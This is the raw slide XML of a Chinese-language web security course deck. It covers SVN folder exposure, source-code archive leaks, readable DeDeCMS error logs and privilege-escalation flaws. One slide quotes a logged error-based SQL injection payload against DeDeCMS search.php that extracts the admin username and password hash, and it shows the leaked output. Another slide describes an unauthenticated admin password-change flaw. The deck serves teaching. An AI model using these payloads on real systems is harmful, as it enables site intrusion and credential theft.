            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Subversion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SVN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，是一个开放源代码的版本控制系统，相对于的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RCS</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CVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，采用了分支管理系统，它的设计目标就是取代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。互联网上越来越多的控制服务从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>转移到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Subversion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</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这就使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.svn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>隐藏文件夹被暴露于外网环境，黑客可以借助其中包含的用于版本信息追踪的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>entries”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件，逐步摸清站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27651" name="Picture 3" descr="24114524a98cd92fe19094b11f659717a53706bd"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="11099"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1323975" y="2934388"/>
            <a:ext cx="6192591" cy="3133242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27653" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="15684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SVN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>信息泄露</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑"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539750" y="260350"/>
            <a:ext cx="15557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源码信息泄露</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65538" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="1052513"/>
            <a:ext cx="7272338"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网站源码泄露</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>192.168.1.13/www.rar</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="1916113"/>
            <a:ext cx="4248150" cy="3960812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28677" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="1916113"/>
            <a:ext cx="4248150" cy="3960812"/>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539750" y="260350"/>
            <a:ext cx="20129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日志文件信息泄露</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="981075"/>
            <a:ext cx="7920037" cy="4984750"/>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DeDeCMS的错误日志默认是可以访问并查看的：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>www.xxxx.com/v2009//data/mysql_error_trace.inc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以看到如下信息：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Page: /v2009/plus/search.php?keyword=as&amp;typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Error: Duplicate entry '1|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="E91A28"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="E91A28"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>92cfbe16701</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="E91A28"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="E91A28"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3665a93c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>' for key 1 &lt;br /&gt;Error sql: &lt;font color='red'&gt;Select arc.*,act.typedir,act.typename,act.isdefault,act.defaultname,act.namerule,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>		act.namerule2,act.ispart,act.moresite,act.siteurl,act.sitepath</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>		from `dede_archives` arc left join `dede_arctype` act on arc.typeid=act.id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>		where  typeid in (111=@`\'`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),1,62)))a from information_schema.tables group by a)b)#@`\'` )  And  arc.arcrank &gt; -1  And ( CONCAT(arc.title,' ',arc.writer,' ',arc.keywords) like '%s%' )  order by arc.sortrank desc limit 0,10&lt;/font&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从日志里可以分析出很久以前，有人通过注入漏洞，暴出了管理员后台用户名和密码。</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06</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251"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越权漏洞</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1292562"/>
            <a:ext cx="8208714" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>越权漏洞是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。所以测试越权就是和开发人员拼细心的过程。</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     可能存在越权的位置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    上面说过了只要对数据库进行增、删、改、查询的情况都可能存在越权。我们来看一般我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用开发时操作数据库常会出现的一般语句：</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增加：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>insert into tablename values(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一些字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) where userid/username=12345/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户名 </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删除： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>delete from tablename where id=123 </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更改：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一些字段 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>tablename set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一些字段 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>where userid/username=12345/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户名</a:t>
            </a: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查询：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from tablename where id=12345</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="1098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越权漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34"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836613"/>
            <a:ext cx="7272338" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>越权修改任意管理员密码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>admin_modify.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进行认证，就直接执行修改指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的管理员账号密码操作，导致黑客可以利用该漏洞实现修改任意管理员密码操作漏洞代码如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="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pic>
        <p:nvPicPr>
          <p:cNvPr id="56323" name="Picture 3" descr="0016"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755576" y="1910556"/>
            <a:ext cx="7200900" cy="4411663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56326"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修改任意管理员密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34"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836613"/>
            <a:ext cx="7272338"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    当提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时，便可以直接访问</a:t>
            </a:r>
